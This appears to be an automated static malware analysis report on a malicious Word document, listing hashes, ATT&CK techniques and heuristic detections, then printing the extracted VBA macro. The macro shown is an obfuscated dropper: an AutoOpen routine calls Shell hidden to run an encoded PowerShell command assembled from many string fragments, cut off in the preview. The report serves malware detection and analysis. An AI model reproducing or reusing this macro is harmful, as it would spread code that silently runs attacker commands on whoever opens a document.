Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a87adcfbb182e173…

MALICIOUS

Office (OLE)

Size: 78.8 KB
Created: 2018-05-29 19:25:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 5ab194fe98fbe075c8def97188f62849
SHA-1: d4c955deb03e9961e046f3f39c17615bce2f2965
SHA-256: a87adcfbb182e173f79f795e05ac7c7aebd7dc510ab6994ccb25e3a1daef997f
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1071.001 Application Layer Protocol: Web Protocols

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine triggers the execution of a function that uses the Shell() command with the vbHide parameter. This indicates the macro is designed to execute a command, likely to download and run a second-stage payload, which is a common dropper behavior. The ClamAV detection further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6565287-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565287-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13985 bytes
SHA-256: e2a94167865bb81480165a341dffec708b6898bbf7d540ce4ed4a7a5ed0642f3
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "lbuEISFI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OFiiHhGalz()
On Error Resume Next
bnSnoX = Atn(81251 * CInt(39112) + 20198 - 16924)
HiPQn = 48977 + _
Log(79318) - bnczq / Atn(61657) / Otihzf / vQiVi
iAzWhF = Atn(96155 * CInt(94367) + 98336 - 64182)
sDhSDz = 76571 + _
Log(54381) - vIwlc / Atn(18053) / wjwiSr / UapGS
OFiiHhGalz = ciHfcIZsOY + RGTAkQrKDQ + rbnNSS + MqjijuQrJS + MZAEKi + jTUwr + wpPou + lSwuPBZw
iwPMmp = Atn(92244 * CInt(96686) + 85538 - 84183)
usbfZ = 8505 + _
Log(23578) - XZBOAw / Atn(57264) / oNsNt / qZwtk
End Function
Sub Autoopen()
On Error Resume Next
nNhDrh = Atn(77444 * CInt(49900) + 30534 - 66856)
VdMuLj = 66614 + _
Log(29009) - IoHlz / Atn(57556) / YBChj / NFKsw
ilMMTl (OFiiHhGalz)
SKDlG = Atn(35516 * CInt(44182) + 69966 - 63553)
fsPdWq = 98519 + _
Log(12327) - DNKPYN / Atn(2752) / BQGjT / LwCECA
End Sub
Function ilMMTl(YQTQj)
On Error Resume Next
ctpzW = Atn(18058 * CInt(33823) + 5336 - 95036)
GEwuJ = 14773 + _
Log(90032) - XEEVUa / Atn(84143) / KDhTl / FdbTUS
mGvKpZik = EYVInP + Chr(vbKeyP) + pDYhbuLV
EjLEs = Atn(537 * CInt(61052) + 44695 - 76357)
oIZfw = 27286 + _
Log(14234) - PFKwN / Atn(41077) / lKwTTp / ciTUtR
wZdhpbidX = IlhNc + Shell(oCOsLHFr + mGvKpZik + clQiwruait + YQTQj + ACXctrljHnH, vbHide)
ZMoXBs = Atn(22281 * CInt(23515) + 32436 - 18335)
TuFNq = 10998 + _
Log(42453) - aHphEU / Atn(25145) / juMbU / zptWbM
End Function



Attribute VB_Name = "SZtoEzuhOnN"
Function ciHfcIZsOY()
On Error Resume Next
JFdFwu = Atn(72680 * CInt(25577) + 14042 - 8708)
wupMCu = 90460 + _
Log(73369) - wjpLK / Atn(54285) / MZfjoA / PjzGHE
RKRwLmJ = "owersH" + "eLL -" + "WinDowsTy" + "le hi" + "dden -e" + " IAAoACgAKAA"
kmrRQb = Atn(10789 * CInt(75098) + 17492 - 88880)
DPBZP = 33020 + _
Log(90050) - PZnbU / Atn(5620) / vafFon / YNzwut
BFdsBDlbo = "iAHsAMwAzAH0Ae" + "wAxADIAfQB7ADUA" + "OAB9AHsANQAzAH" + "0AewAxADgAf" + "QB7ADcAf" + "QB7ADYAMAB9A" + "HsAMgA" + "4AH0AewA2"
ZZQlj = Atn(71628 * CInt(71273) + 96107 - 80208)
jLlpE = 94534 + _
Log(20558) - OVjfH / Atn(7398) / MWrnc / WBVpz
jcfTBS = "ADgAfQB" + "7ADEANgB9AHsAMw" + "A5AH0Ae" + "wAxAH0" + "AewA0ADIA" + "fQB7ADUAMgB9AHs" + "ANQA2AH0"
qlRKz = Atn(70191 * CInt(27539) + 47750 - 56980)
rTQmc = 62536 + _
Log(46829) - uSMjW / Atn(28875) / KNBKJP / FZUkw
YuMCripYRd = "AewAxADUAf" + "QB7ADYANQ" + "B9AHsAMgA1" + "AH0Aew"
jusfb = Atn(19941 * CInt(58899) + 45342 - 43971)
npcCuj = 20497 + _
Log(19582) - CQmXN / Atn(28452) / mrOqS / jNjzZh
iWfjqLnU = "A0ADUAfQB7ADUAN" + "wB9AHsANAB9AHsA" + "MAB9AHsAN" + "wAyAH0AewAzAH0A" + "ewAyADAAfQB7A" + "DMAOAB9A" + "HsANAA" + "3AH0A" + "ewA3A" + "DAAfQB7ADYA"
MkWnX = Atn(26151 * CInt(38788) + 63269 - 25118)
YPKWt = 87725 + _
Log(94484) - fQHXn / Atn(17307) / XvFPSv / dFBSu
JapTrl = "MgB9AHsAMQAw" + "AH0AewAzA" + "DUAfQB7ADE" + "ANwB9AHs" + "ANQB9AHsANAAz" + "AH0AewAzADAAfQB" + "7ADMANgB9"
zzumZl = Atn(81139 * CInt(52663) + 15526 - 41575)
UmbtRw = 78761 + _
Log(94424) - HASOR / Atn(89300) / RmEUb / wYjVVw
scLQqKZvCW = "AHsAMgAz" + "AH0AewAxADMAf" + "QB7ADEANA" + "B9AHsANAA0AH" + "0AewA2ADEAf" + "QB7ADEAMQB9AHsA" + "NAA5AH" + "0AewA" + "2ADkAf"
SEPZP = Atn(90353 * CInt(61466) + 37490 - 26027)
JMVhr = 98090 + _
Log(64485) - VfbZpD / Atn(1965) / VoDNv / qvuCls
KzIoUbsR = "QB7ADQANgB9AH" + "sAMwAxAH0Aew" + "A2ADMAfQ" + "B7ADgAf" + "QB7ADIAMQB9" + "AHsANgB9AHs" + "AMgA2AH0AewAyA" + "DIAfQB7ADYANgB9" + "AHsANQA" + "wAH0AewA2ADQA"
WOqDau = Atn(14952 * CInt(12474) + 32860 - 13637)
wpASZ = 87881 + _
Log(30124) - YBZrP / Atn(99916) / iVZno / piwQl
AsQpWhfmR = "fQB7ADUAOQ" + "B9AHsANQA1AH0Ae" + "wAyADQ" + "AfQB7ADM" + "AMgB9AH" + "sANwAxAH0Ae"
OItHE = Atn(63879 * CInt(58366) + 28679 - 12676)
YWAmZT = 93585 + _
Log(94520) - aDKMl / Atn(63669) / SLJHBC / YACftV
LOqjm = "wA2AD" + "cAfQB7ADEAOQB" + "9AHsAMwA0A" + "H0AewAyADc" + 
... (truncated)